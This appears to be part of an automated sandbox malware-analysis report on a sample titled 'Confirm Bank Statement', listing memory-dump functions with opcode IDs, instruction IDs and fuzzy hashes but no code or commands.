                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8c7852a50026cd0b623f006d462fa76a4d4e8420b7f9e2922306b47a11127e5a
                                                                                              • Instruction ID: e3e5f78f112c92c777921c5aa5dc08aa71e4c27b341bd4cdcc1633cb78f11164
                                                                                              • Opcode Fuzzy Hash: 8c7852a50026cd0b623f006d462fa76a4d4e8420b7f9e2922306b47a11127e5a
                                                                                              • Instruction Fuzzy Hash: 2E219D356007058FDB68EB34C848BEAB3B7FFC0211F00886DD0591B260DF71A98ACB92
                                                                                              Function 055B9210 Relevance: .1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d96b5ed00e9641df217703196373ddfea5c62146f2a3908698659763abcadbea
                                                                                              • Instruction ID: 17c4310b5c78bfc8bd5355b9524a17fa8cd2748daddebba763632456ab69d553
                                                                                              • Opcode Fuzzy Hash: d96b5ed00e9641df217703196373ddfea5c62146f2a3908698659763abcadbea
                                                                                              • Instruction Fuzzy Hash: 11012871B052555FDF05A7688C996EFBBB9FFC9114F040069E404F7380DA344D068396
                                                                                              Function 013DD4BF Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1265839929.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_13dd000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                              • Instruction ID: 9c0fe141c134f198357d01071644383557f8871cbac2dc2d54906d241d504a89
                                                                                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                              • Instruction Fuzzy Hash: 5A11E676504280DFCB16CF54D5C4B16BF72FB84328F24C6A9D8490B697C336D456CBA1
                                                                                              Function 013DD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1265839929.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_13dd000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                              • Instruction ID: 14cc9d97db6ba64917cbafb6d3a0f55eae0a5d4a50a5a113bfb1263f86c3483e
                                                                                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                              • Instruction Fuzzy Hash: 591103B6504240DFCB16CF44D5C0B56BF72FB84328F24C2A9D8090B297C33AE456CBA1
                                                                                              Function 0727A558 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00c5df25a959f2ea9d2ab8844a5a40d33f08b0e5f3e66728ca59a294236bb608
                                                                                              • Instruction ID: 3988a5a8f0e17d213f727349263f37471d32d79fbdbf35b7d31f4c3676045993
                                                                                              • Opcode Fuzzy Hash: 00c5df25a959f2ea9d2ab8844a5a40d33f08b0e5f3e66728ca59a294236bb608
                                                                                              • Instruction Fuzzy Hash: 921149B1D146589BEB18CF6BC8043DEBFF6AFC9310F14C06AC809A6254DB7409458F90
                                                                                              Function 072759B8 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c82d3400eb551e4716e296cd53a5b39003547ab8a7311c491bcb7114968e573
                                                                                              • Instruction ID: af0feb11f6ca98c81886408bbace35404f7b7f7046eef48e9b064aeae8bd2159
                                                                                              • Opcode Fuzzy Hash: 7c82d3400eb551e4716e296cd53a5b39003547ab8a7311c491bcb7114968e573
                                                                                              • Instruction Fuzzy Hash: B111E4B0D24209DFCB04CFAAD5856AEFBF5BF89300F10816AC409E3250E7741A51CF50
                                                                                              Function 072725C9 Relevance: .1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e30ee457e786a0d2db77cbfdd13cdc58ca82cc9aab865a6d1cf4e76bcb73b3a3
                                                                                              • Instruction ID: e734634ddf477d8623392b4bedf9956c8645867a2bb76aec120a57d48ed3fec5
                                                                                              • Opcode Fuzzy Hash: e30ee457e786a0d2db77cbfdd13cdc58ca82cc9aab865a6d1cf4e76bcb73b3a3
                                                                                              • Instruction Fuzzy Hash: B01125B0A29347CFD7069B24C9207A93BF4AF47210F08449BC491DB1D1DB78C985C762
                                                                                              Function 055BB59A Relevance: .1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8429ceb0fa4751b27340c0b45bfa922d6428b92f365a2b45d314a4b908477916
                                                                                              • Instruction ID: c7d3a52d1b93864c14369611d3964cffe7ea722aebe60594a5cd5643aafd86c6
                                                                                              • Opcode Fuzzy Hash: 8429ceb0fa4751b27340c0b45bfa922d6428b92f365a2b45d314a4b908477916
                                                                                              • Instruction Fuzzy Hash: 4E0192363042014BE7248E1DCC997A97BD6FF89320F1984B5E54ACF3A6DAB5DC058790
                                                                                              Function 0727CDCB Relevance: .1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db262b4459f9ca3688fda1f675fb099d6016564ea251dd498e0963b94d42105c
                                                                                              • Instruction ID: 900238b2d06cfc18ae4a5ea8efcad1ba1d1e8d59013310307dcc3f3e033bde4e
                                                                                              • Opcode Fuzzy Hash: db262b4459f9ca3688fda1f675fb099d6016564ea251dd498e0963b94d42105c
                                                                                              • Instruction Fuzzy Hash: 8C21E6B4A10218DFCB14DFA4D5556BCBBB6FF85601F209169D80AABB05DB345C41CF51
                                                                                              Function 055B4C18 Relevance: .1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 085ba06a94c79dc4cc2b9fea4c8d139820b589aaa281d77d72922f236302cb96
                                                                                              • Instruction ID: d7137d7eb4b70177704a2d83c02f37a996130039e0173c20b9cecc18a4a21dba
                                                                                              • Opcode Fuzzy Hash: 085ba06a94c79dc4cc2b9fea4c8d139820b589aaa281d77d72922f236302cb96
                                                                                              • Instruction Fuzzy Hash: 1E114F31A00209DBDF25DFA5E4197DEBBF2FF88211F104869D506A7291CBB95D05CB91
                                                                                              Function 072759C8 Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 59bf789b95e9daee7272d8b547c90ce7bcc1756cdfc8df7f1406d454bf15cf7f
                                                                                              • Instruction ID: 40dc3f5308411ba1670f8ad6ad7a0b902a7386f0375384abd826b6aff3fba18a
                                                                                              • Opcode Fuzzy Hash: 59bf789b95e9daee7272d8b547c90ce7bcc1756cdfc8df7f1406d454bf15cf7f
                                                                                              • Instruction Fuzzy Hash: 9311A2B0D24209DFCB44DFAAD6856AEFBF5BF49300F10816AD419A3250E7745A91CF90
                                                                                              Function 013ED1CF Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266158138.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_13ed000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                              • Instruction ID: 6e5430f5e74f2558c59ce6c040201fe233458539b548a401f2ff049fc43b4515
                                                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                              • Instruction Fuzzy Hash: FF11BB79504280DFCB06CF54C6C4B15BBB2FB84328F24C6ADD8494B296C33AD40ACB61
                                                                                              Function 013ED017 Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266158138.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_13ed000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                              • Instruction ID: f465af47abc063c8e93207f06d7d8a079e9e4456573665883ab1904942ac88fe
                                                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                              • Instruction Fuzzy Hash: 25118E75504380DFDB16CF54D5C4B15BFA2FB44318F28C6A9D8494B696C33AD84ACB61
                                                                                              Function 055B1EA0 Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a6b6fc7af3f9dd9a46a314a86a3e40618bb5ac642603417daea766d9500695ab
                                                                                              • Instruction ID: 0997a7961f698165912faffead71d75dff454254aa75bf792485798c985c641b
                                                                                              • Opcode Fuzzy Hash: a6b6fc7af3f9dd9a46a314a86a3e40618bb5ac642603417daea766d9500695ab
                                                                                              • Instruction Fuzzy Hash: 85117C76E00A0A9BDB58DB99D81A6FEBBB6FF88310F544029E505D3381DB749A01CBD1
                                                                                              Function 07276E10 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 26358935d48468be7fc94b77cd7ec9d82a7ead4293aab7199b2fb5d13bf81e0f
                                                                                              • Instruction ID: 8a7280e6d9d2364502d9df19f34bee78f949ea36994c7faeed3e5ad24b0dd5aa
                                                                                              • Opcode Fuzzy Hash: 26358935d48468be7fc94b77cd7ec9d82a7ead4293aab7199b2fb5d13bf81e0f
                                                                                              • Instruction Fuzzy Hash: 2D119EB0C2468ADFCB00CFA9C945AEEFFF5EF4A200F1081AAE418A3291D7751A41CF51
                                                                                              Function 055B80F0 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d2d0f1e9b7f53193049858fd52d5d6db43e0866d0884ffb79ced6e28638dea5
                                                                                              • Instruction ID: 997e366605a423afbd148ff16928375a1b03ef960b9a0f4d2f27ed36a7d59cce
                                                                                              • Opcode Fuzzy Hash: 7d2d0f1e9b7f53193049858fd52d5d6db43e0866d0884ffb79ced6e28638dea5
                                                                                              • Instruction Fuzzy Hash: 4111E4B5D006488FDB10DF9AD449B9EFBF8EB49210F14851AD815A7310D774A505CFA1
                                                                                              Function 055BA2E9 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 32b614d6a6970e5f912c0f2f52f06c05ef0200b73126475cd58b91b3ac7a841c
                                                                                              • Instruction ID: 2e250009d468df5c690ac5c318e5e70b5c9adf7cae9589a338b9bb121f02d468
                                                                                              • Opcode Fuzzy Hash: 32b614d6a6970e5f912c0f2f52f06c05ef0200b73126475cd58b91b3ac7a841c
                                                                                              • Instruction Fuzzy Hash: EF1146B5D002098FDB20DF9AD548BDEFBF4FB48320F24811AD518A3600C775A544CFA1
                                                                                              Function 055B82A4 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 45be2acc927900c13a9f941918f06602525a8e39811734ba530c4d11441a9514
                                                                                              • Instruction ID: a592f0e9593fa9a22d9d4be488139b7a342eeb1cf9aaf4c48e26229e1a82ebcc
                                                                                              • Opcode Fuzzy Hash: 45be2acc927900c13a9f941918f06602525a8e39811734ba530c4d11441a9514
                                                                                              • Instruction Fuzzy Hash: E01112B5C002088FDB20DF9AD448B9EFBF8FB49220F14841AD819A7310D7B8A905CFA1
                                                                                              Function 07276EB8 Relevance: .0, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 53ef974108450b2c9cdb2cb2b9a214dbd2b2487405c5e12662e31ae5da95cd67
                                                                                              • Instruction ID: 600c811321e05859851617f8e0be1b74f28feb4408c37878d18ba24289e22520
                                                                                              • Opcode Fuzzy Hash: 53ef974108450b2c9cdb2cb2b9a214dbd2b2487405c5e12662e31ae5da95cd67
                                                                                              • Instruction Fuzzy Hash: 65115EB0D1465ADFCB44CFA9C5406AEFFF4AF46304F1485AAD415A7250E7744A41CF42
                                                                                              Function 055B8CD0 Relevance: .0, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 14d9ac254a4351179c1b10da4bf57919531854d20f35cefc14913ef971e5073d
                                                                                              • Instruction ID: af4d0899775c2211ee7c9a2f197fa68ff4267252192a2af72a8f9895d01e063c
                                                                                              • Opcode Fuzzy Hash: 14d9ac254a4351179c1b10da4bf57919531854d20f35cefc14913ef971e5073d
                                                                                              • Instruction Fuzzy Hash: 9311E2B5C006088FDB10DF9AD844B9EFBF8EB49220F14851AD819A7310D778A505CFA1
                                                                                              Function 055B54F9 Relevance: .0, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: af3cb4ebf08720326b1ca290af3f931abdd73661b11d2c619bfb38d02d649979
                                                                                              • Instruction ID: 2d92a4e99be37fb66b585ad4eb07cdb946f22a33028b23c8a8e82f603e3af4bc
                                                                                              • Opcode Fuzzy Hash: af3cb4ebf08720326b1ca290af3f931abdd73661b11d2c619bfb38d02d649979
                                                                                              • Instruction Fuzzy Hash: 5001CC71A001049FEB049F58D84ABAB7AF6FF88218F054429F002FB394DE799C04DBA1
                                                                                              Function 0727AFF8 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f08b5116d92a238dfd5ff9eb919cbdae5aade8334da93438818b54a6e47aa90d
                                                                                              • Instruction ID: 84ecf2fc2b552578456862d597a4b06e7fa90e230eb249053d93ce21332b9a38
                                                                                              • Opcode Fuzzy Hash: f08b5116d92a238dfd5ff9eb919cbdae5aade8334da93438818b54a6e47aa90d
                                                                                              • Instruction Fuzzy Hash: FD112EB0D24218DFDB08CF6AC5449AEBBF6BF89301F00D029E819A7354DB719841CF90
                                                                                              Function 07276E20 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 801f5a135582929396963b1c0ef9dd0363549c3712545bd750e2890a1124b327
                                                                                              • Instruction ID: 1545d9983afc45d24fe4a4467657d8ed8efcf5420466c3db372b555e1186f372
                                                                                              • Opcode Fuzzy Hash: 801f5a135582929396963b1c0ef9dd0363549c3712545bd750e2890a1124b327
                                                                                              • Instruction Fuzzy Hash: E21127B0D2464ADFCB44CFA9C645AEEFBF5AF4A200F10806AD418E3251E7711A40CFA0
                                                                                              Function 07276EC8 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: da7a0b466ca735341e0380ccaccfe6994166244fe958dfc36d5acb1fa0fa45a9
                                                                                              • Instruction ID: 2e4158d0abb366b29b0fa2be728928a5b2bc2e8cadb8a51d84ccee9b6884f1fc
                                                                                              • Opcode Fuzzy Hash: da7a0b466ca735341e0380ccaccfe6994166244fe958dfc36d5acb1fa0fa45a9
                                                                                              • Instruction Fuzzy Hash: 6D11FAB0D2460ADFCB44DFA9C6416AEFBF5AB49304F10846AD819E3240E7B45A41CF92
                                                                                              Function 055BB458 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e18890b6a5721653f0cf222b324a938c1b342b471feacf2d2a100b396f73bf0b
                                                                                              • Instruction ID: 1b955c3847a48dcd54bfac5298f847968bc25e76a13ad5ee56c072222d979e48
                                                                                              • Opcode Fuzzy Hash: e18890b6a5721653f0cf222b324a938c1b342b471feacf2d2a100b396f73bf0b
                                                                                              • Instruction Fuzzy Hash: 8F0126367082029FD7248E25C84AEE577AABF81230B09419AD811C72A6DFE4D815C792
                                                                                              Function 072706E0 Relevance: .0, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4d15d27cf28e977fad276046dec854d12bf2f18475d9f2ee263301e957be548
                                                                                              • Instruction ID: d197b95954f83ecae8e94f3718c77e1ee12150d86c236da3b2c652dacd4f5143
                                                                                              • Opcode Fuzzy Hash: b4d15d27cf28e977fad276046dec854d12bf2f18475d9f2ee263301e957be548
                                                                                              • Instruction Fuzzy Hash: 5901F7B0A103078BF735961BD588B7BBB9BEFC4311F048529E8464A654DF71AC4ACA41
                                                                                              Function 055B4C08 Relevance: .0, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f8b9d7d591b5d76c69db9105d344c7fe0b2f4fd351d06425ea196b0bce3d86f8
                                                                                              • Instruction ID: 10417e0443138f60f19678b1148037449a8f64c479fe49067f5836b5d57963ce
                                                                                              • Opcode Fuzzy Hash: f8b9d7d591b5d76c69db9105d344c7fe0b2f4fd351d06425ea196b0bce3d86f8
                                                                                              • Instruction Fuzzy Hash: 4401A171A00204CFEF29DFA4E4197DA7BF2FF84211F004859D506AB395CEB95905CB91
                                                                                              Function 055B1EB0 Relevance: .0, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e107e234974cfbfa91973917d31debbec60890185fd79ceed07ea1398ec26ec8
                                                                                              • Instruction ID: aa87ae8db6295a8c0d0eb82cdb58ad2faf6463fd91b8da48fe94018c70074a26
                                                                                              • Opcode Fuzzy Hash: e107e234974cfbfa91973917d31debbec60890185fd79ceed07ea1398ec26ec8
                                                                                              • Instruction Fuzzy Hash: 10015B75F00A0A8BDB55DB99D8196BEBBB6FF88210F144029E505D3340DB749A11CBD5
                                                                                              Function 07272518 Relevance: .0, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aa660c0254d1a7821d2e34ba07df2b27883925ef9720662831f1f0c0fee3df9a
                                                                                              • Instruction ID: d306abfae8025acc3a963cdc4dfba88a2252a28276377574271f0c3bde1f07db
                                                                                              • Opcode Fuzzy Hash: aa660c0254d1a7821d2e34ba07df2b27883925ef9720662831f1f0c0fee3df9a
                                                                                              • Instruction Fuzzy Hash: 5711A171D1021A8FDB04EFA8D9917AE7BF0EF49314F04852AC511F7395D7B88A81CB90
                                                                                              Function 0727B431 Relevance: .0, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 590b0704ff607dd45cb93da587d18c65cc56a7f3c4bbba6f0dd46f63530d8c01
                                                                                              • Instruction ID: 3ae5d378026b65a2a60871e3cbdaf5dcb78eae45aa9d7b335f28d0702a6d3940
                                                                                              • Opcode Fuzzy Hash: 590b0704ff607dd45cb93da587d18c65cc56a7f3c4bbba6f0dd46f63530d8c01
                                                                                              • Instruction Fuzzy Hash: 060140B5928144DFDB00CFB8C6A5AACBFF5AF4A300F1991D5D5099B362C6709E04DB00
                                                                                              Function 0727B3B9 Relevance: .0, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
